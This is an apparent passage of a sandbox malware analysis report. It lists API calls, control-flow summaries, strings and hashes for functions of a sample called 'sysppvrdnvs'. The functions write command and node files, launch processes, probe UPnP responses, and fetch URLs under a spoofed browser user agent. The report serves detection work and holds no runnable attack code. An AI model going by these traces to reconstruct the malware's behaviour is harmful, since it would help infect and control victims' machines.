                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                    • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                    • String ID: %x%X$0
                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                    • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                    • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                    • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69
                                                                                                                                    Function 0040F240 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 281 40f240-40f27f CreateFileW 282 40f285-40f2a0 CreateFileMappingW 281->282 283 40f39a-40f39e 281->283 284 40f390-40f394 CloseHandle 282->284 285 40f2a6-40f2bf MapViewOfFile 282->285 286 40f3a0-40f3c0 CreateFileW 283->286 287 40f3f4-40f3fa 283->287 284->283 288 40f2c5-40f2db GetFileSize 285->288 289 40f386-40f38a CloseHandle 285->289 290 40f3c2-40f3e2 WriteFile CloseHandle 286->290 291 40f3e8-40f3ec call 40ab60 286->291 292 40f2e1-40f2f4 call 40d1a0 288->292 293 40f37c-40f380 UnmapViewOfFile 288->293 289->284 290->291 296 40f3f1 291->296 292->293 298 40f2fa-40f309 292->298 293->289 296->287 298->293 299 40f30b-40f32b call 40cb40 298->299 301 40f330-40f33a 299->301 301->293 302 40f33c-40f367 call 40ae90 memcmp 301->302 302->293 305 40f369-40f375 call 40ab60 302->305 305->293
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                    • memcmp.NTDLL ref: 0040F35D
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902698870-0
                                                                                                                                    • Opcode ID: 4db5bbf808ca6209af07bc620d99265e856426a218e6ae7e28e736729e861070
                                                                                                                                    • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                    • Opcode Fuzzy Hash: 4db5bbf808ca6209af07bc620d99265e856426a218e6ae7e28e736729e861070
                                                                                                                                    • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98
                                                                                                                                    Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 332 40dd50-40dd80 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 333 40dd86-40dd9a InterlockedExchangeAdd 332->333 334 40de69-40de80 GetCurrentThread SetThreadPriority 332->334 333->334 335 40dda0-40dda9 333->335 336 40ddac-40ddb3 335->336 336->334 337 40ddb9-40ddd4 EnterCriticalSection 336->337 338 40dddf-40dde7 337->338 339 40de27-40de3c LeaveCriticalSection 338->339 340 40dde9-40ddf6 338->340 343 40de47-40de4d 339->343 344 40de3e-40de45 339->344 341 40de03-40de25 WaitForSingleObject 340->341 342 40ddf8-40de01 340->342 345 40ddd6-40dddc 341->345 342->345 346 40de5c-40de64 Sleep 343->346 347 40de4f-40de58 343->347 344->334 345->338 346->336 347->346 348 40de5a 347->348 348->334
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02DE0638,000000FF), ref: 0040DD5D
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02DE0638,000000FF), ref: 0040DD6F
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
                                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                    • Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99
                                                                                                                                    Function 0040BC70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                      • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                      • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\tbtnds.dat, xrefs: 0040BCC8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                    • String ID: C:\Users\user\tbtnds.dat
                                                                                                                                    • API String ID: 439099756-3213863656
                                                                                                                                    • Opcode ID: ccc133b3a2719448c357ee090de33a9a253bd19a1288fb5d1e4dd52cd71b561e
                                                                                                                                    • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                    • Opcode Fuzzy Hash: ccc133b3a2719448c357ee090de33a9a253bd19a1288fb5d1e4dd52cd71b561e
                                                                                                                                    • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                    Function 00405C00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 377 405c00-405c32 InitializeCriticalSection CreateFileW 378 405d25-405d28 377->378 379 405c38-405c53 CreateFileMappingW 377->379 380 405c59-405c72 MapViewOfFile 379->380 381 405d1b-405d1f CloseHandle 379->381 382 405d11-405d15 CloseHandle 380->382 383 405c78-405c8a GetFileSize 380->383 381->378 382->381 384 405c8d-405c91 383->384 385 405c93-405c9a 384->385 386 405d07-405d0b UnmapViewOfFile 384->386 387 405c9c 385->387 388 405c9e-405cb1 call 40d1d0 385->388 386->382 387->386 391 405cb3 388->391 392 405cb5-405cca 388->392 391->386 393 405cda-405d05 call 405d30 392->393 394 405ccc-405cd8 call 40ab60 392->394 393->384 394->386
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\tbtcmds.dat, xrefs: 00405C20
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                    • String ID: C:\Users\user\tbtcmds.dat
                                                                                                                                    • API String ID: 3956458805-1042172597
                                                                                                                                    • Opcode ID: 974004ace8664300cc06a05cec65fa0b1c2f2106c5fa1c12cbbfe4d81678685e
                                                                                                                                    • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                    • Opcode Fuzzy Hash: 974004ace8664300cc06a05cec65fa0b1c2f2106c5fa1c12cbbfe4d81678685e
                                                                                                                                    • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                    Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 399 40f400-40f460 memset * 2 CreateProcessW 400 40f471-40f495 ShellExecuteW 399->400 401 40f462-40f46f Sleep 399->401 403 40f4a6 400->403 404 40f497-40f4a4 Sleep 400->404 402 40f4a8-40f4ab 401->402 403->402 404->402
                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040F40E
                                                                                                                                    • memset.NTDLL ref: 0040F41E
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F467
                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F49C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                    • String ID: $D$open
                                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                                    • Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
                                                                                                                                    • Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
                                                                                                                                    • Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759
                                                                                                                                    Function 004060A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 405 4060a0-4060ca EnterCriticalSection call 40d230 408 4060d0-4060e3 call 40d1d0 405->408 409 4062e3-4062f4 LeaveCriticalSection 405->409 408->409 412 4060e9-4060f8 408->412 413 406103-40610c 412->413 414 406112-406130 413->414 415 406206-40620c 413->415 418 406132 414->418 419 406134-4061ff memcpy call 40ab60 call 40abd0 call 40ab60 call 40cb40 call 4076c0 414->419 416 406239-40624b call 40ab60 415->416 417 40620e-40621c call 405d30 415->417 416->409 428 406251-406272 CreateFileW 416->428 424 406221-406229 417->424 418->413 419->415 424->416 427 40622b-406235 424->427 427->416 428->409 430 406274-40627b 428->430 432 406286-40628f 430->432 435 406291-4062cd WriteFile 432->435 436 4062cf-4062dd FlushFileBuffers CloseHandle 432->436 438 40627d-406283 435->438 436->409 438->432
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\tbtcmds.dat, xrefs: 00406260
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                    • String ID: C:\Users\user\tbtcmds.dat
                                                                                                                                    • API String ID: 1457358591-1042172597
                                                                                                                                    • Opcode ID: 473e882c89c664cfdcd286b03a5016877069028d52e26d7ad4cadbb5d95af1e0
                                                                                                                                    • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                    • Opcode Fuzzy Hash: 473e882c89c664cfdcd286b03a5016877069028d52e26d7ad4cadbb5d95af1e0
                                                                                                                                    • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                    Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 442 40e310-40e32a 443 40e33b-40e342 442->443 444 40e3f4-40e3fd 443->444 445 40e348-40e367 recvfrom 443->445 446 40e376-40e393 StrCmpNIA 445->446 447 40e369-40e374 Sleep 445->447 449 40e395-40e3b4 StrStrIA 446->449 450 40e3ef 446->450 448 40e32c-40e335 447->448 448->443 449->450 451 40e3b6-40e3ed StrChrA call 40d320 449->451 450->448 451->450
                                                                                                                                    APIs
                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                    • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                    • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                    • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                    • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                    Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                    Strings
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                                    • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                    • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                    • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                    • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                    Function 0040B530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
                                                                                                                                    • InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\tbtnds.dat, xrefs: 0040B5C3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                    • String ID: C:\Users\user\tbtnds.dat
                                                                                                                                    • API String ID: 442028454-3213863656
                                                                                                                                    • Opcode ID: 3151d336ff3ea58e3689bb3ae90e4ef78bf08bbeca3ebf0d4b51fe39718170bb
                                                                                                                                    • Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
                                                                                                                                    • Opcode Fuzzy Hash: 3151d336ff3ea58e3689bb3ae90e4ef78bf08bbeca3ebf0d4b51fe39718170bb
                                                                                                                                    • Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99
                                                                                                                                    Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                    • String ID: %s%s
                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                    • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
